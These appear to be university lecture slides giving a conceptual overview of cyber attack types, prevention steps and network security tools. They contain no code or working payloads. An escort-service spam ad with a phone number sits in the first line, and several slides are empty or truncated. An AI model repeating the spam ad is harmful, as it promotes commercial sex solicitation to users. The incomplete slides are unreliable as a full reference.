(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
Cyber attacks
1. Overview of Cyber Attacks
Dr. Anuradha T
Department of Computer Science and
Engineering
PDA College of Engineering, Kalaburagi17-Mar-19 1
2. Topics to Covered
• What is a Cyber Attack
• How does the Cyber Attacks Look Like
• Cyber Attack Classified
• Types of Cyber Attacks
• How to Prevent Cyber Attacks
• Security Attacks
• Classification of Security Attacks
• Network Management Tools
• Research Areas
17-Mar-19 2
3. What is Cyber Attack?
• Cyber is a prefix used in a growing number of technology
and IT terms to describe new things that are being made
possible by the spread of computers.
• Cyber Attack is an attempt by hackers to damage or
destroy a computer network or system.
17-Mar-19 3
4. How does the Cyber Attacks Look Like
• It appears to come from your bank or credit card
company. It seems urgent and includes a link to click.
However, if you look closely at the email, you can find clues
that it might not be real.
• Another way is when you download a file that contains a
malicious piece of code, usually a worm or Trojan horse.
• This can happen by downloading e-mail files, but it can
also happen when you download apps, videos, and music
files online.
• As soon as you open the file, your computer is infected and
the virus, worm, or Trojan horse begins to spread.
17-Mar-19 4
5. Cyber Attacks Classified
• Syntactic attacks
• Semantic attacks
• Syntactic attacks are different types of malicious software
that attack your computer through various channels.
• The most frequent types of software used in syntactic
attacks include: Viruses
• A virus is a piece of software that can attach itself to
another file to reproduce. This type of software is often
found in file downloads and email attachments, the virus is
activated, it replicates, and sends itself to everyone in your
contacts file.
17-Mar-19 5
6. • Worms: don't need another file to replicate and spread.
These little bits of software are also more sophisticated and
can collect and send data to a specified location using
information about the network when it's on.
• A worm infects a computer when it's delivered via another
piece of software on a network.
• A trojan horse could be an email that looks like it comes
from a trusted company, when in fact, it's been sent by
criminals or bad actors.
•
17-Mar-19 6
7. Semantic Cyber Attacks
• Semantic attacks are more about changing the perception
or behavior of the person or organization that's being
attacked.
• There is less focus placed on the software involved.
• Semantic Cyber attacks, also known as social engineering,
manipulate human users’ perceptions and interpretations
of computer-generated data in order to obtain valuable
information (such as passwords, financial details, and
classified government information) from the users through
fraudulent means. Social-engineering techniques include
phishing—in which attackers send seemingly…
17-Mar-19 7
8. Social Engineering
• Social engineering, manipulate human users’ perceptions
and interpretations of computer-generated data in order to
obtain valuable information (such as passwords, financial
details, and classified government information) from the
users through fraudulent means. Social-engineering
techniques include phishing—in which attackers send
seemingly…
17-Mar-19 8
11. Different Types of Cyber attacks
17-Mar-19 11
Figure 2. Types of Cyber Attacks.
12. Denial-of-service (DoS) and
distributed denial-of-service (DDoS)
attacks
• A denial-of-service attack overwhelms a system’s resources so
that it cannot respond to service requests.
• A DDoS attack is also an attack on system’s resources, but it is
launched from a large number of other host machines that are
infected by malicious software controlled by the attacker.
• Unlike attacks that are designed to enable the attacker to gain or
increase access, denial-of-service doesn’t provide direct benefits
for attackers.
• There are different types of DoS and DDoS attacks; the most
common are TCP SYN flood attack, teardrop attack, smurf
attack, ping-of-death attack and botnets.
17-Mar-19 12
13. TCP SYN flood attack
• In this attack, an attacker exploits the use of the buffer space during a
Transmission Control Protocol (TCP) session initialization handshake.
Teardrop attack
• This attack causes the length and fragmentation offset fields in
sequential Internet Protocol (IP) packets to overlap one another on the
attacked host.
Smurf attack
• This attack involves using IP spoofing and the ICMP to saturate a
target network with traffic.
Ping of death attack
• Ping of death attacks can be blocked by using a firewall that will check
fragmented IP packets for maximum size.
Botnets
• Botnets are the millions of systems infected with malware under
hacker control in order to carry out DDoS attacks.
17-Mar-19 13
14. Man-in-the-middle (MitM) attack
• A MitM attack occurs when a hacker inserts itself between
the communications of a client and a server.
Example: Session hijacking
• The attacker hijacks a session between a trusted client and
network server. The attacking computer substitutes its IP
address for the trusted client while the server continues the
session, believing it is communicating with the client.
Example: IP Spoofing
• IP spoofing is used by an attacker to convince a system that
it is communicating with a known, trusted entity and
provide the attacker with access to the system.
17-Mar-19 14
15. • The attacker sends a packet with the IP source address of a
known, trusted host instead of its own IP source address to
a target host. The target host might accept the packet and
act upon it.
Example: Replay
• A replay attack occurs when an attacker intercepts and
saves old messages and then tries to send them later,
impersonating one of the participants.
17-Mar-19 15
17. Phishing and spear phishing attacks
• Phishing attack is the practice of sending emails that
appear to be from trusted sources with the goal of gaining
personal information.
• It could involve an attachment to an email that loads
malware onto your computer.
• Attackers take the time to conduct research into targets
and create messages that are personal and relevant.
• One of the simplest way a hacker can conduct a spear
phishing attack is email spoofing, which is when the
information appears as if it is coming from someone you
know very well.17-Mar-19 17
18. Drive by Attack
• Drive-by download attacks are a common method of
spreading malware.
• Hackers look for insecure websites and plant a malicious
script into HTTP code on one of the pages.
• This script might install malware directly onto the
computer of someone who visits the site.
• To protect yourself from drive-by attacks, you need to keep
your browsers and operating systems up to date and avoid
to keep too many apps on your device.
17-Mar-19 18
19. Password Attack
• Access to a person’s password can be obtained by looking
around the person’s desk, ‘‘sniffing’’ the connection to the
network to acquire unencrypted passwords, using social
engineering, gaining access to a password database or
outright guessing.
• Brute-force password guessing means using a random
approach by trying different passwords and hoping that
one work.
17-Mar-19 19
20. • Dictionary attack: a dictionary of common
passwords is used to attempt to gain access to a
user’s computer and network. One approach is
to copy an encrypted file that contains the
passwords, apply the same encryption to a
dictionary of commonly used passwords, and
compare the results.
• In order to protect yourself from dictionary or
brute-force attacks, you need to implement an
account lockout policy that will lock the
account after a few invalid password attempts.
17-Mar-19 20
21. SQL injection attack
• SQL injection has become a common issue with database-
driven websites.
• It occurs when a malefactor executes a SQL query to the
database via the input data from the client to server.
• SQL commands are inserted into data-plane input in order
to run predefined SQL commands.
• A successful SQL injection exploit can read sensitive data
from the database, modify (insert, update or delete)
database data, execute administration operations (such as
shutdown) on the database, recover the content of a given
file, and, in some cases, issue commands to the operating
system.17-Mar-19 21
22. Cross-site scripting (XSS) attack
• XSS attacks use third-party web resources to run scripts in
the victim’s web browser or scriptable application.
• Specifically, the attacker injects a payload with malicious
JavaScript into a website’s database.
• When the victim requests a page from the website, the
website transmits the page, with the attacker’s payload as
part of the HTML body, to the victim’s browser, which
executes the malicious script.
• It might send the victim’s cookie to the attacker’s server,
and the attacker can extract it and use it for session
hijacking.
17-Mar-19 22
24. Eavesdropping attack
• Eavesdropping attacks occur through the interception of
network traffic.
• By eavesdropping, an attacker can obtain passwords,
credit card numbers and other confidential information
that a user might be sending over the network.
• Eavesdropping can be passive or active:
• Passive eavesdropping — A hacker detects the information
by listening to the message transmission in the network.
17-Mar-19 24
25. • Active eavesdropping — A hacker actively grabs the
information by disguising himself as friendly unit and by
sending queries to transmitters. This is called probing,
scanning or tampering.
• Detecting passive eavesdropping attacks is often more
important than spotting active ones, since active attacks
requires the attacker to gain knowledge of the friendly
units by conducting passive eavesdropping before.
17-Mar-19 25
26. Birthday Attack
• Birthday attacks are made against hash algorithms that
are used to verify the integrity of a message, software or
digital signature.
• A message processed by a hash function produces a
message digest (MD) of fixed length, independent of the
length of the input message; this MD uniquely
characterizes the message.
17-Mar-19 26
27. • The birthday attack refers to the probability of finding two
random messages that generate the same MD when
processed by a hash function.
• If an attacker calculates same MD for his message as the
user has, he can safely replace the user’s message with his,
and the receiver will not be able to detect the replacement
even if he compares MDs.
17-Mar-19 27
28. Malware attack
• Malicious software can be described as unwanted software that is
installed in your system without your consent. It can attach itself to
legitimate code and propagate; it can lurk in useful applications or
replicate itself across the Internet. Here are some of the most common
types of malware:
• Macro viruses —
• File infectors —
• System or boot-record infectors —
• Polymorphic viruses — These viruses conceal
• Stealth viruses
• Trojans —
• Logic bombs
• Worms —
• Droppers —
• Ransomware —
17-Mar-19 28
29. How to Prevent Cyber Attacks
Steps you can take to reduce your risk of falling victim to a
costly cyber attack:
• Train employees in cyber security principles.
• Install, use and regularly update antivirus and antispyware
software on every computer used in your business.
• Use a firewall for your Internet connection.
• Download and install software updates for your operating
systems and applications as they become available.
17-Mar-19 29
30. • Make backup copies of important business data and
information.
• Control physical access to your computers and network
components.
• Secure your Wi-Fi networks. If you have a Wi-Fi network
for your workplace make sure it is secure and hidden.
• Require individual user accounts for each employee.
• Limit employee access to data and information and limit
authority to install software.
• Regularly change passwords
17-Mar-19 30
31. • Use patches. All it takes is a tiny hole in your system for
hackers to poke their way in
• Protect outbound data. Just as you protect your system
from incoming malware and bots with a firewall, you need
to make sure certain data never leaves your system. It’s
important to focus on egress filtering, to prevent rogue
employees or employees making honest mistakes from
releasing sensitive data or malicious software from your
network.
• Raise awareness. It’s important for everyone in the
organization to be savvy and alert about security issues.
• Be smart about passwords.
• Don’t ignore physical security.
• Encrypt data.
• Purchase a Cyber Insurance policy
17-Mar-19 31
32. Classification of security attacks
• The attacks can be classified into two broad categories,
namely, active and passive attacks.
• An attacker can exploit the network either as internal or
external and as active or passive.
• Active attack: The aim of active attack is to adapt the data
being exchanged in the network and thus disrupt the
regular functioning of the network. The intruder can alter
the packets, inject the packets, and drop the packet. Such
attacks are very dangerous.
• without disturbing normal network operation.
20-10-2018 32
33. • Passive attack: The aim of passive attack is to snoop the
confidential information about routing, which shall be kept
secret during the communication. It obtains such
information.
• The active attacks can be external and internal attacks, as
discussed below:
• External attack: External attackers mainly exist outside
the networks. They want to get access to the network. Once
they get access, they start sending bogus packets and
perform denial of service in order to disrupt the
performance of the whole network.
20-10-2018 33
34. • These attacks can be prevented by implementing security
measures such as firewall, where the access of
unauthorized person to the network can be mitigated.
• Internal attack: In internal attack, the attacker wants to
have normal access to the network as well as participate in
the normal activities of the network.
• The attacker gains access to the network as a new node
either by compromising a current node or by malicious
impersonation.
• Impact of the internal attack is more severe than that of
external attacks. The common examples of such attacks are
blackhole and wormhole attacks, which are explained
below.17-Mar-19 34
35. Security in different layers of
protocol stack
• Application programs do not interact with the network
hardware directly. Rather, it interacts with protocol
software.
• The concept of layered protocol gives a theoretical basis
for knowing how a collection of protocols work mutually
with the hardware to provide a strong powerful
communication system.
• Different studies suggest different methods or techniques
to handle security issues in many ways.
20-10-2018 35
36. Table 1. shows different layers in the protocol stack
of the network.
17-Mar-19 36
37. Blackhole attack
• The blackhole attack is one among the active and severe attack in
MANETS. The node 1 is the source node and the node 4 represents the
destination node. Node 3 is a node which acts as a blackhole (BH)
node.
• The attacker replies with the false reply RREP having higher modified
sequence number. Therefore, node 1 erroneously judges the route
discovery process with completion and starts to send data packets to
node 3, which probably drops or consumes all the packets.
20-10-2018 37
RREQ Malicious RREP
Figure 5. A blackhole attack in the mobile ad-hoc network
39. What is Wireshark?
• Wireshark is a network packet analyzer. A network packet
analyzer will try to capture network packets and tries to
display that packet data as detailed as possible.
• Network packet analyzer as a measuring device used to
examine what's going on inside a network cable, just like a
voltmeter is used by an electrician to examine what's going on
inside an electric cable.
• In the past, such tools were either very expensive, proprietary,
or both. However, with the advent of Wireshark, all that has
changed.
• Wireshark is perhaps one of the best open source packet
analyzers available today.
17-Mar-19 39
40. Some intended purposes
• Network administrators use it to troubleshoot network
problems
• Network security engineers use it to examine security
problems
• Developers use it to debug protocol implementations
• People use it to learn network protocol internals
17-Mar-19 40
41. What Wireshark is not
• Wireshark isn’t an intrusion detection system. It will not
warn you when someone does strange things on your
network that he/she isn’t allowed to do.
• However, if strange things happen, Wireshark might help
you figure out what is really going on.
• Wireshark will not manipulate things on the network, it
will only “measure” things from it.
• Wireshark doesn’t send packets on the network or do
other active things (except for name resolutions, but even
that can be disabled).
17-Mar-19 41
42. • Wireshark and TShark share a powerful filter engine that
helps remove the noise from a packet trace and lets you see
only the packets that interest you.
• If a packet meets the requirements expressed in your filter,
then it is displayed in the list of packets.
• Display filters let you compare the fields within a protocol
against a specific value, compare fields against fields, and
check the existence of specified fields or protocols.
• Wireshark can capture traffic from many different
network media types - and despite its name - including
wireless LAN as well.
• Installing steps for Downloading Wireshark
17-Mar-19 42
43. Dumpcap
• Dumpcap is a network traffic dump tool. It lets you
capture packet data from a live network and write the
packets to a file.
• Dumpcap's native capture file format is libpcap format,
which is also the format used by Wireshark, tcpdump and
various other tools.
• Without any options set it will use the pcap library to
capture traffic from the first available network interface
and writes the received raw packet data, along with the
packets' time stamps into a libpcap file.
17-Mar-19 43
44. • If the -w option is not specified, Dumpcap writes to a newly
created libpcap file with a randomly chosen name.
• If the -w option is specified, Dumpcap writes to the file
specified by that option.
• Packet capturing is performed with the pcap library. The
capture filter syntax follows the rules of the pcap library.
17-Mar-19 44
45. NetStumbler (Network Stumbler
• It is one of the Wi-Fi hacking tool which only compatible
with windows it freely available.
• With this program, we can search for wireless network
which open and infiltrate the network.
• Its having some compatibility and network adapter issues
17-Mar-19 45
46. Key features of NetStumbler
• Verify that your network is set up the way you intended.
• Find locations with poor coverage in your WLAN.
• Detect other networks that might be causing interference
with your network.
• Detect unauthorized “rogue” access points in your
workplace.
17-Mar-19 46
47. Netstrumbler can provide the user
• MAC address
• SSID
• Access point name
• Channel
• Vendor
• Security (WEP on or off)
• Signal strength and GPS coordinates (if GPS device is
attached)
17-Mar-19 47
48. Honeypot
• A honeypot is a device placed on a computer network
specifically designed to capture malicious network
traffic.
• The logging capability of a honeypot is far greater than
any other network security tool and captures raw packet
level data even including the keystrokes and mistakes
made by hackers.
• The captured information is highly valuable as it
contains only malicious traffic with little to no false
positives.
• Honeypots are becoming one of the leading security tools
used to monitor the latest tricks and exploits of hackers
by recording their every move so that the security
community can more quickly respond to new exploits.
17-Mar-19 48
49. Snort
• Snort is one of the network management tool used
to give alarm when someone tries to enter into
your own network specially used for intrusion
detection system (IDS).
17-Mar-19 49
50. Topics for Research To be taken
• The secure routing protocols based on graphs and cluster
classification can be explored.
• The proposed secure aware schemes to be applied to a
proactive, hybrid protocol and compare with the
performance to that for reactive protocols.
• The secure routing protocols attacks can also be examined
using honeypots.
• The proposed protocols can also be applied to various
types of security attacks.
17-Mar-19 50